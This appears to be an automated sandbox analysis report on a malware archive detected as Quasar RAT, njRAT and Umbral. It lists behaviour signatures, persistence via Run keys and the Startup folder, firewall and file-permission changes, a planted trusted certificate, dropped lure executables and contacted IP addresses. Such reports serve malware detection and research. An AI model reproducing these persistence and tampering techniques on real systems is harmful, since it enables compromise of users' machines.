Analysis Overview
SHA256
de59c7b1cef753487469ad372c2dbebfa31043fc403aceeadbb24cab42e79889
Threat Level: Known bad
The file 240927-mh3m1sxgrm_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Quasar family
njRAT/Bladabindi
Umbral
Quasar payload
Umbral family
Quasar RAT
UAC bypass
Njrat family
Detect Umbral payload
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Possible privilege escalation attempt
Drops file in Drivers directory
Manipulates Digital Signatures
Blocklisted process makes network request
.NET Reactor proctector
Unexpected DNS network traffic destination
Drops startup file
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Event Triggered Execution: Component Object Model Hijacking
Modifies file permissions
Password Policy Discovery
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Obfuscated Files or Information: Command Obfuscation
Adds Run key to start application
Looks up external IP address via web service
Sets desktop wallpaper using registry
UPX packed file
Suspicious use of SetThreadContext
AutoIT Executable
Enumerates processes with tasklist
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
HTTP links in PDF interactive object
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Program crash
NSIS installer
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Kills process with taskkill
Runs net.exe
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Runs regedit.exe
Delays execution with timeout.exe
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Suspicious behavior: AddClipboardFormatListener
NTFS ADS
Modifies Internet Explorer settings
Modifies registry class
Enumerates system info in registry
Scheduled Task/Job: Scheduled Task
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Gathers network information
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-08 09:18
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Njrat family
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
HTTP links in PDF interactive object
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 09:16
Reported
2024-11-08 09:21
Platform
win7-20241023-en
Max time kernel
150s
Max time network
164s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\DRIVERS\SETE8D9.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETE8D9.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\droidcam.sys | C:\Windows\system32\DrvInst.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b30200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000330035003000310063006100310064002d0032006600360064002d0034003600300036002d0061006500340037002d0035006400610061006500300037003100340061003600350000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b3030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd0200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000330035003000310063006100310064002d0032006600360064002d0034003600300036002d0061006500340037002d0035006400610061006500300037003100340061003600350000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = 0f00000001000000140000005499b4f34c6397ce83670cd84156bdc761f906b3030000000100000014000000430e77033e527f42dc67bc6984d33d889a73f0cd200000000100000000030000308202fc308201e4a003020102021033edcc7a9050638b4ebed4f8f15b4a5b300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313835385a180f32313234313031353039313835385a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b82e6da8da56e44fb30c49a7bdc482bb9dca611d387f58526b4a0e5e0b800bf7aa47905e92ed1a6d124b929819391bad86059acb1771958341ec9d69e0747cc883709c117047778f4365d4f71b5645dfcc2430aab7b07a67af0bd67d382a98ac927f8410e76a7be57a9ed6a6e08c2604649c6a574c2c64fd4569f2b5d041985135c0c692a7f911205cfb5e5188cc5e4fa09ddb37caad8a808c6b735c929e705ec2201e91891eb72408769fd1949b24c53b87793cfbf1ece50b76b992723162930f19c81fa1ad81e6410813d3681e1d1f4768fceee7f035271ce4169150fae829aaf6b3f329b4753c9b33011326c1482c64a3aab54563fbafebc8c8e20dcffe790203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40504a4353444d52500030090603551d1304023000300d06092a864886f70d010105050003820101002b95f3244ef7172719b16e2c504a129ce40aa3eed42d8163b6387400c94562ee63249ca00e1cd91d6e3e5236941dd7fc1eea25e448201badc4186432fef63809b581790577b12dcfb0b167670a3d96cf55231fcb8c827f874e3e835bee7b68bffc8b9ebe67c9641746a8fce97480f40fd2ce8e7c26334f59a4d17c1e5822995877545d531fcac5a65e2b47ddee843edc79e0537e1cfdb0c35985912d82a67adf3ab01eb48bc64a69c9bcef6b9c42757e5aaf09c71f14f32c6205ee69753f7b70082ae0fdd3ebf152afce8f1977620b26a8946a4aaac5afb2ad1f5aedf6e2b80be614ce2f660dedbad3494c938771fbbcaf6daaa7f5c769f6a2db5a814d40c50b | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 185.93.182.46 | N/A | N/A |
| Destination IP | 74.208.156.127 | N/A | N/A |
| Destination IP | 5.157.51.190 | N/A | N/A |
| Destination IP | 172.105.221.253 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\cmd.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Password Policy Discovery
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infstrng.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infpub.dat | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infstor.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infpub.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infstrng.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infpub.dat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\INFCACHE.0 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\infstrng.dat | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF | C:\Windows\system32\DrvInst.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.app.log | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\INF\oem2.PNF | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev2 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| File created | C:\Windows\INF\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\setupact.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\setuperr.log | C:\Windows\system32\DrvInst.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
